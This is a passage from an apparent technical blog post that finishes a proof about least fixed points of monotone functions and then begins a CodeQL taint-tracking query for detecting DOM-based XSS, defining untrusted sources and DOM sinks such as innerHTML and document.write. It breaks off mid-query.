class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7719em;vertical-align:-0.136em"></span><span class="minner">⋯</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>. Consider the last element of the chain, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>.
<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}_n = F(\overline{X}_n)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>, otherwise it is not the last element. Therefore it is a fixed point.</p>
<p>Now consider an arbitrary fixed point <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span>. In the base case, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>=</mo><mi mathvariant="normal">⊥</mi><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_0 = \bot \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8304em;vertical-align:-0.136em"></span><span class="mord">⊥</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>. Also,</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mrow><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo stretchy="false">)</mo><mo>⊑</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo><mo>=</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\overline{X}_i \sqsubseteq \overline{Y} \implies \overline{X}_{i+1} = F(\overline{X}_i) \sqsubseteq F(\overline{Y}) = \overline{Y}
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.5433em;vertical-align:-0.5217em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.0217em"><span style="top:-3.1383em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2083em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.5217em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>so by induction, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_i \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> for all <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>0</mn><mo>≤</mo><mi>i</mi><mo>≤</mo><mi>n</mi></mrow><annotation encoding="application/x-tex">0 \leq i \leq n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7804em;vertical-align:-0.136em"></span><span class="mord">0</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7955em;vertical-align:-0.136em"></span><span class="mord mathnormal">i</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">n</span></span></span></span>. In particular,
<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_n \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>, so <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span> is at least as "small" as any other fixed point, and thus the least fixed point.</p>
<h2>Writing a taint tracking query</h2>
<p>Let's walk through a CodeQL query that looks for basic DOM-based XSS vulnerabilities in a JavaScript codebase. To start, we need to define
a configuration for taint tracking:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> UnsafeDOMManipulationConfiguration</span><span style="color:#F47067"> extends</span><span style="color:#F69D50"> TaintTracking</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Configuration</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F69D50">  UnsafeDOMManipulationConfiguration</span><span style="color:#ADBAC7">() { </span><span style="color:#6CB6FF">this</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> "UnsafeDOMManipulationConfiguration"</span><span style="color:#ADBAC7"> }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Now, we need to define the sources. These are the places where untrusted data first enters the program. In this case, we're looking for
<code>RemoteFlowSource</code> (data from e.g. a request parameter), <code>ClientRequest::Range</code> (data from a HTTP response), and <code>SomeOtherSource</code>
(a custom source that we've defined elsewhere).</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSource</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> source</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> RemoteFlowSource</span><span style="color:#F47067"> or</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ClientRequest</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Range</span><span style="color:#F47067"> or</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> SomeOtherSource</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>These are used in the first iteration, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi><mo stretchy="false">(</mo><mi mathvariant="normal">⊥</mi><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">F(\bot)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord">⊥</span><span class="mclose">)</span></span></span></span>, to mark all variables directly tainted by these sources. In the following iterations, variables that are derived from
these sources are also marked as tainted.</p>
<p>Next, we need to define the sinks. These are the places where tainted data can cause harm. Eventually, we want to find all paths from any source to any sink,
and those will be the results of our query.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390">// Sink functions from https://web.dev/articles/trusted-types</span></span>
<span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSink</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> sink</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">  // Direct assignment to innerHTML or outerHTML</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PropWrite</span><span style="color:#ADBAC7"> pw |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pw.</span><span style="color:#DCBDFB">getPropertyName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> [</span><span style="color:#96D0FF">"innerHTML"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"outerHTML"</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> pw.</span><span style="color:#DCBDFB">getRhs</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // Element.insertAdjacentHTML()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "insertAdjacentHTML"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // Direct assignment to iframe.srcdoc</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PropWrite</span><span style="color:#ADBAC7"> pw |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pw.</span><span style="color:#DCBDFB">getPropertyName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "srcdoc"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> pw.</span><span style="color:#DCBDFB">getRhs</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // document.write() and document.writeln()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> [</span><span style="color:#96D0FF">"write"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"writeln"</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#F69D50"> DOM</span><span style="color:#ADBAC7">::</span><span style="color:#DCBDFB">documentRef</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // DOMParser.parseFromString()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "parseFromString"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">getALocalSource</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">NewNode</span><span style="color:#F47067"> and</span></span>
